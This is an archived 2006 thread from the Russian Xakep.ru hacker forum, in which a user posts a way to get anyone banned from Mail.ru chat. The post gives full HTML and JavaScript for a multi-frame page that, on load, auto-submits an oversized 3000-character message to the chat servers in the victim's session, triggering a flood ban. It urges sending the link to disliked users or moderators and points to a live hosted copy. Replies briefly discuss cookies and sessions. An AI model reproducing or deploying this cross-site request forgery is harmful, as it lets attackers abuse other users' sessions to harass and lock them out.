Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

бан любого на ЧАТ@МАИЛ.СРУ

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [В Сети] >> бан любого на ЧАТ@МАИЛ.СРУ
Имя
Сообщение << Старые топики   Новые топики >>
бан любого на ЧАТ@МАИЛ.СРУ - 2006-12-11 08:57:02   
IVIidNight

Сообщений: 2
Оценки: 0
Присоединился: 2006-12-06 15:51:18.280000
Кароче..на чате маил.сру максимальная длина отправляемого в чат сообщения составляет 300 символов…. смотрите в файле keyboard(это самый нижний в чате фрейм) строку:
document.write('<input type="text" name="message" maxlength="300" style="width:'+size+'px" size="80" value="">');
вот если отправить в чат сообщение длиной более 300,скажем например 3000 символом,то сервер маил.сру посчитает это за флуд(превышение длины сообщения) и закроет вам доступ в комнату по мылу(не по ИП,как могут модеры). Под другим мылом можно будет зайти в эту комнату. Работает даже на модерах :) ….. модератору был закрыт доступ в комнату за флуд :))))) …. сработает наверно и на создателе комнаты…еще не пробовал.
Ну так вот….сейчас на чате есть 1.chat.mail.ru и 2.chat.mail.ru…. заливаем на сайтег файл с 4(!!!) можно и больше фреймами…а в каждый фреймовый файл делаем отправку сообщений в чат……
===ПРИМЕР ФАЙЛА INDEX.HTM===
<html>
<head>
<title>Start page</title>
<meta http-equiv="Содержимое-Тип" content="text/html; charset=windows-1251">
</head>
<frameset rows="*,*" cols="*,*" frameborder="NO" border="1" framespacing="0">
  <frame name="cornerFrame" src="2.htm" >
  <frame name="topFrame" src="1.htm" >
  <frame name="leftFrame" src="3.htm" >
  <frame name="mainFrame" src="4.htm">
</frameset>
<noframes>
<body bgcolor="#FFFFFF" text="#000000">
</body>
</noframes>
</html>
===============================
=======ПРИМЕР 1 ФРЕЙМА============
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=windows-1251">
<link href="http://img.mail.ru/r/chat/port.css" rel=stylesheet type="text/css">
<script>
<!–
if ( navigator.appName == 'Netscape') {
        window.captureEvents(Event.KEYPRESS);
        window.onkeypress = pressed;
}
function pressed(e) {
  if( e.which==13 ) send();
}
var stopImageString = "http://img.mail.ru/r/chat/stop.gif"
var playImageString = "http://img.mail.ru/r/chat/play.gif";
var imgStop = new Image();
var imgPlay = new Image();
var sendProcess = 0;
var sendProcessTimer = 0;
imgStop.src = stopImageString;
imgPlay.src = playImageString;
function clear_sendProcess() {
        sendProcess = 0;
        if ( sendProcessTimer ) clearTimeout(sendProcessTimer);
        //document.getElementById("sendbtn").src = "http://img.mail.ru/r/chat/post.gif";
}
function set_sendProcess() {
        //document.getElementById("sendbtn").src = "http://img.mail.ru/r/chat/delete.gif";
        sendProcess = 1;
        sendProcessTimer = setTimeout(clear_sendProcess, 10000);
}
function send() {
        var ff = document.forms['kbd_form'];
        var fo = document.forms['kbd_out'];
        if ( sendProcess ) return false;
        if ( ff.message.value == "") return false;
        fo.to.value  = ff.to.value;
        fo.message.value = ff.message.value;
        fo.submit();
        set_sendProcess();
        cls();
        return false;
}
function load() {
        top.startclock();      
        clms();
        setfocus();
}
function unload() {
        top.closeChild();
        top.stopclock();
}
function cls() {
        var ff = document.forms['kbd_form'];   
        ff.message.value = "";
        ff.message.focus();    
}
function clms() {
        var ff = document.forms['kbd_form'];   
        ff.to.value  = "";
        ff.message.value = "";
        ff.message.focus();
}
function setfocus() {
        var ff = document.forms['kbd_form'];   
        ff.message.focus();
        ff.message.select();
}
function away() {
        if( document.getElementById('stop').src == stopImageString ) {
                document.getElementById('stop').src = playImageString;
                document.getElementById('stop').alt = "Wakeup";
                var fo = document.forms['kbd_away'];
                fo.away.value = "1";   
                fo.submit();
                setfocus();
        } else {
                document.getElementById('stop').src = stopImageString;
                document.getElementById('stop').alt = "Away";
                var fo = document.forms['kbd_away'];
                fo.away.value = "0";
                fo.submit();
                setfocus();
        }
}
function ab() {
        if( document.getElementById('stop') ) {
                document.getElementById('stop').src = playImageString;
                document.getElementById('stop').alt = "Wakeup";
        }
        if( top.setclock ) top.setclock();
}
function as() {
        if( document.getElementById('stop') ) {
                document.getElementById('stop').src = stopImageString;
                document.getElementById('stop').alt = "Away";
        }
        if( top.setclock ) top.setclock();
}
function quit() {
        top.closeChild();
        var fo = document.forms['kbd_exit'];
        fo.submit();
}
// –>
</script>
</head>
<body text=black bgcolor=#000000 link=#2C5D92 vlink=#2C5D92 alink=#2C5D92
          marginwidth=0 marginheight=0 topmargin=0 leftmargin=0
          onLoad="send()" onUnLoad="unload()">
<table width=100% height=100% cellpadding=0 cellspacing=2 border=0>
<form action="/cgi-xml/post" name="kbd_form" target="kbd_1" onSubmit="return send()">
<tr valign=middle>
<td>&nbsp;</td>
<td class=novost><input type=text name=to size=7 onFocus="setfocus()" readonly></td>
<td width=90% class=novost><script>
<!–
var size = document.body.clientWidth-1230;
document.write('<input type="text" name="message" maxlength="3000" style="width:'+size+'px" size="0" value="Итак. Мне достаточно часто приходилось видеть в обзорах уязвимостей об атаке, названной SQL-инъекцией. Такой тип атак уже достаточно широко известен, но я всё таки опишу, что же он из себя представляет. Многим сценариям(далее скриптам) приходится общаться с базой данных, выбирая оттуда какую-либо информацию, либо сохраняя её. А общаться ему приходится с помощью структурированнаго языка запросов(Structured Query Language или просто SQL), т.к. именно он зарекомендовал себя как простой и эффективный язык запросов к базам данных. Выбирает информацию из базы скрипт чаще всего либо для проверки с какими-либо значениями, либо для вывода этой информации пользователю. Теперь представим, что пользователь должен ввести значение в поле ввода, а скрипт должен найти, скажем, показать пользователю имя и страну участника под тем номером, который ввёл пользователь. Но если то, что ввёл пользователь никак не проверяется перед SQL-запросом, то пользователь может ввести в поле ввода апостроф, что приведёт к неправильному запросу, т.к. апостроф в языке SQL служит ограничителем данных(например символьных). Поясню на примере: пользователь ввёл 13, запрос выглядит так Итак. Мне достаточно часто приходилось видеть в обзорах уязвимостей об атаке, названной SQL-инъекцией. Такой тип атак уже достаточно широко известен, но я всё таки опишу, что же он из себя представляет. Многим сценариям(далее скриптам) приходится общаться с базой данных, выбирая оттуда какую-либо информацию, либо сохраняя её. А общаться ему приходится с помощью структурированнаго языка запросов(Structured Query Language или просто SQL), т.к. именно он зарекомендовал себя как простой и эффективный язык запросов к базам данных. Выбирает информацию из базы скрипт чаще всего либо для проверки с какими-либо значениями, либо для вывода этой информации пользователю. Теперь представим, что пользователь должен ввести значение в поле ввода, а скрипт должен найти, скажем, показать пользователю имя и страну участника под тем номером, который ввёл пользователь. Но если то, что ввёл пользователь никак не проверяется перед SQL-запросом, то пользователь может ввести в поле ввода апостроф, что приведёт к неправильному запросу, т.к. апостроф в языке SQL служит ограничителем данных(например символьных). Поясню на примере: пользователь ввёл 13, запрос выглядит так">');      
//–>
</script></td>
<td><input id=sendbtn type=image src="http://img.mail.ru/r/chat/post.gif" width=5 height=2 border=0 vspace=0 onmousemove="window.status='Отправить'"></td>
<td><a href="javascript:clms();"><img src="http://img.mail.ru/r/chat/delete.gif" width=1 height=2 border=0 vspace=0 onmousemove="window.status='Стереть'"></a></td>
<script>
<!–
if( top.getChild ) {
        document.write('<td><a href="javascript:away();"><img id=stop width=2 height=2 border=0 vspace=0 onmousemove="window.status=\'Away/Wakeup\'"></a></td>');
        document.getElementById('stop').src = stopImageString;
        document.getElementById('stop').alt = "Away";
}
//–>
</script>
<td><a href="javascript:quit()"><img src="http://img.mail.ru/r/chat/exit.gif" width=1 height=1 border=0 vspace=0 onmousemove="window.status='Выход'"></a></td>
<td>&nbsp;</td>
</tr>
</form>
<form name="kbd_out" action="http://2.chat.mail.ru/cgi-xml/post" target="kbd_1" method=post>
<input type=hidden name=to  value="">
<input type=hidden name=message value="">
</form>
<form name="kbd_enter" action="/cgi-xml/enter" target="_top" method=post>
<input type=hidden name=room  value="">
<input type=hidden name=nick value="">
</form>
<form name="kbd_ignore" action="/cgi-xml/ignore" target="kbd_1">
<input type="hidden" name="nick" value="" >
<input type="hidden" name="ignore">
</form>
<form name="kbd_kick" action="/cgi-xml/kick" target="kbd_1">
<input type="hidden" name="nick" value="">
</form>
<form name="kbd_away" action="/cgi-xml/away" target="kbd_1">
<input type="hidden" name="away">
</form>
<form name="kbd_exit" action="/cgi-xml/exit" target="kbd_1">
<input type="hidden" name="exit">
</form>
<form name="kbd_subscribe" action="http://my.chat.mail.ru/cgi-bin/invite" target="kbd_1">
<input type="hidden" name="channelid" value="">
<input type="hidden" name="subscribe" value="">
</form>
</table>
</body>
</html>
========================================
 
<body text=black bgcolor=#000000 link=#2C5D92 vlink=#2C5D92 alink=#2C5D92
          marginwidth=0 marginheight=0 topmargin=0 leftmargin=0
          onLoad="send()" onUnLoad="unload()">
обратите внимание на то что при загрузке странички сразу отправляется сообщение===> onLoad="send()"
в других фреймах измените в строке <form name="kbd_out" action="http://2.chat.mail.ru/cgi-xml/post" target="kbd_1" method=post>
http://2.chat.mail.ru/cgi-xml/post на http://1.chat.mail.ru/cgi-xml/post и так далее :)
итак…впариваем злой линк непонравившемуся юзверю или модеру(создателю) и он получает бан:)))
пример…вернее уже готовый бан можете посмотреть на сайте… http://softvare2006.narod.ru , кстати я им щас пользуюсь…. попробуйте..вам понравится…. зайдите в чат и в новом окне интернет эксплорера откройте этот линк :)
****************************************************************************************
ВНИМАНИЕ!!! РАБОТАЕТ ТОЧНО В ИНТЕРНЕТ ЭКСПЛОРЕРЕ (в других не проверял), В НОВОМ ОКНЕ…ЮЗЕР ДОЛЖЕН БЫТЬ В ЧАТЕ И ОТКРЫТЬ В НОВОМ ОКНЕ ЭТОТ ЛИНК…..
****************************************************************************************

….ЗЫ: объяснять ничо не буду… вопросы не задавать. Если есть соображения,по этому поводу,буду рад обсудить….
Post #: 1
RE: бан любого на ЧАТ@МАИЛ.СРУ - 2006-12-11 22:51:13.953333   
Diabolus

Сообщений: 127
Оценки: 0
Присоединился: 2006-11-18 05:35:27.343333
хехе :)
поиск дырок в веб-чатах.. ностальгия :)
ну а вообще странно, что там авторизация через куки (если я правильно понял)…
в веб-чате, имхо, самое то юзать сессии - и защита от подобных описанной баг, и более рационально :)
Post #: 2
RE: бан любого на ЧАТ@МАИЛ.СРУ - 2006-12-12 09:25:55.826666   
IVIidNight

Сообщений: 2
Оценки: 0
Присоединился: 2006-12-06 15:51:18.280000

да… кукисы там конечно есть, но этот способ сработает только в пределах сессии…. т.е. допустим сессия поддерживаемая в чате в осле… 100% работает :)


Post #: 3
RE: бан любого на ЧАТ@МАИЛ.СРУ - 2006-12-13 01:57:02.736666   
Diabolus

Сообщений: 127
Оценки: 0
Присоединился: 2006-11-18 05:35:27.343333
а блин )
я-то уж решил, что там мона и с нарушением сессии ) гы )
Post #: 4
Страниц:  [1]
Все форумы >> [В Сети] >> бан любого на ЧАТ@МАИЛ.СРУ







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.